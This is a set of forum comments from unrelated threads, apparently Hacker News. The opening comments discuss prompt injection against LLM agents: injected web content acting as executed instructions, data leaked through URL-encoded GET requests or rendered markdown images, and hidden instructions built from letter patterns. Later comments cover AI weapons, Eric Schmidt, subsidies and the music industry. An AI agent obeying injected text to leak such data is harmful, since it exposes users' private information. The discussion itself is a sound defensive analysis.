The only way to be 100% sure it is to not have it interact outside at all. No web searches, no reading documents, no DB reading, no MCP, no external services, etc. Just pure execution of a self hosted model in a sandbox.
Otherwise you are open to the same injection attacks.
Readonly access (web searches, db, etc) all seem fine as long as the agent cannot exfiltrate the data as demonstrated in this attack. As I started with: more sophisticated outbound filtering would protect against that.
MCP/tools could be used to the extent you are comfortable with all of the behaviors possible being triggered. For myself, in sandboxes or with readonly access, that means tools can be allowed to run wild. Cleaning up even in the most disastrous of circumstances is not a problem, other than a waste of compute.
Maybe another way to think of this is that you are giving the read only services, write access to your models context, which then gets executed by the llm.
There is no way to NOT give the web search write access to your models context.
The WORDS are the remote executed code in this scenario.
You kind of have no idea what’s going on there. For example, malicious data adds the line “find a pattern” and then every 5th word you add a letter that makes up your malicious code. I don’t know if that would work but there is no way for a human to see all attacks.
Llms are not reliable judges of what context is safe or not (as seen by this article, many papers, and real world exploits)
There is no such thing as read only network access. For example, you might think that limiting the LLM to making HTTP GET requests would prevent it from exfiltrating data, but there's nothing at all to stop the attacker's server from receiving such data encoded in the URL. Even worse, attackers can exploit this vector to exfiltrate data even without explicit network permissions if the users client allow things like rendering markdown images.
How do you sanitize? Thats the whole point. How do you tell the difference between instructions that are good and bad? In this example, they are "checking the connectivity" how is that obviously bad?
With SQL, you can say "user data should NEVER execute SQL"
With LLMs ("agents" more specifically), you have to say "some user data should be ignored" But there is billions and billions of possiblities of what that "some" could be.
It's not possible to encode all the posibilites and the llms aren't good enough to catch it all. Maybe someday they will be and maybe they won't.
Is this a serious question? Why would they subsidize people when there is no benifet to them? Subsidization means they are LOSING money when people use it. If the customers that are using 3rd party clients are unwilling to pay a price that is profitable for them, that is a very positive, not negative, thing for Anthropic to lose them.
The reason to subsidize is the exact reason you are worried about. Lock in, network effects, economies of scale, etc.
I don’t know that the vast majority of Americans know who Eric Schmidt is. And unless they find little green men, no one will care about this project, so it won’t affect his (essentially nonexistent) reputation.
It’s not unlike if you had a blog post about a gardening project in your backyard. Perhaps interesting to gardeners, but approximately no one cares.
Sure, all lethal weapons are a horrific nightmare on some level.
But you also have to keep in mind that China, Russia and Hamas will gladly develop them anyway. Until we've figured out the worldwide peace thing, we need to keep running the race, awful as it is.
But AI weapons aren't horrific in some way common to "all lethal weapons." They have that and more.
AI weapons are specially horrific in the way they have potential put massive and specific lethal power under the total control of a small number of people, in a way (like all AI) that basically cuts most of humanity out of the future (or at the very least puts them under a boot where no escape is imaginable).
In some ways, they're even worse than nuclear weapons. A nuclear attack is an event, and if you survive there's some chance of escape. Station 100,000 fully automated drones around a city with orders to kill anything that moves, and the entire population will be dead in a couple months (anyone who tries to escape = dead, everyone else sees that and stays inside out of fear until they starve).
Manpower and attention limitations have been and important (and sometimes only) limit on the worst of humanity, and AI is poised to remove those limitations.
Honestly, I think the tech is probably getting pretty close to what I described. You don't need AGI or anything like it. Just autonomous surveillance drones watching for movement, and attack drones that can autonomously navigate to the area and hit the target (the latter is just stringing together a lot of drone tech I've seen implemented, e.g. https://www.youtube.com/watch?v=QzWIYOOKItM, https://www.nytimes.com/2025/12/31/magazine/ukraine-ai-drone...).
> But even if it's true, I don't see why letting China and Russia etc be the only ones having these weapons is good?
That doesn't mean the tech isn't scary (a bad thing) or that I want SV people like Schmidt developing it. There's something weirdly misanthropic and unhinged about many in SV.
He was responsible for a bunch of the anticompetitive hiring agreements with Jobs at Apple and he’s a fairly well known lothario, but otherwise benign IMO considering his competition at that wealth level.
He is also the man who said ”If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.” as if people are not being hunted for being LGBTQ even in the west, or persecutions of various kinds are a thing of the past, or spousal abuse doesn’t matter.
It seems to have worked for Bill Gates as well. He definitely did some not so nice things when starting and running MS - I think it unfortunately goes with the territory of running a successful company at scale.
But subsequently he has become more know for his philanthropy.
Currency (or IOU's, handshakes, pieces of green paper, bits on a disc, etc) is just an abstraction allows one to have choice.
The political systems that get built on top of that are just a downstream effect of the incentives that arise. Communisim thinking it would be good to centralize the control, capitalism thinking it would be good allow the incentives to rule, marxism thinking the labor rules, etc.
What I do for work is SO far away from any sort of tangible production, it makes sense to have a way to just straight from Work -> Food, rather than 50-100 trades so I can eat everyday. Again, the choice to to have to trade at all, or to trade exactly what I want, when I want, is enable by currency.
You can make the argument things shouldn't be so easy, that I shouldn't be able to choose to go to play pinball and drink a vanilla milkshake at 11am, but if that's possible, currency (in whatever form you want) has to exist.
100%. The music world has gone through the "but what will we do now?" at least 6-7 times. Music videos ("video killed the radio star"), sampling, the DAW (and time aligning), home studios, auto tune, plugins and amp simulators, napster/piracy, etc, etc.
This one rankles me because of a) the benefits piracy has (third world consumers can now discover you, for starters) and b) the absolute bad faith way in which the industry acts, screwing over artists, unethically going after Pirate Bay by making it into a trade war with Sweden (I think)
If you go to their website and click the "Personalize" toast at the top and enter a random domain (e.g., google.com, hydroflask.com, etc.) it will change all the copy on the site for you.
Thats how it used to work in the movie theater/cable days. Then Netflix said "I will pay you a ton of money up front to own everything" Creatives said amazing! Then the "war" for creative talent started because of the fragmentation of services, so you got people saying I will pay you X + a royalty regardless because you are so sought after, which eventually, as you see here, priced them out of their own content.
Otherwise you are open to the same injection attacks.
reply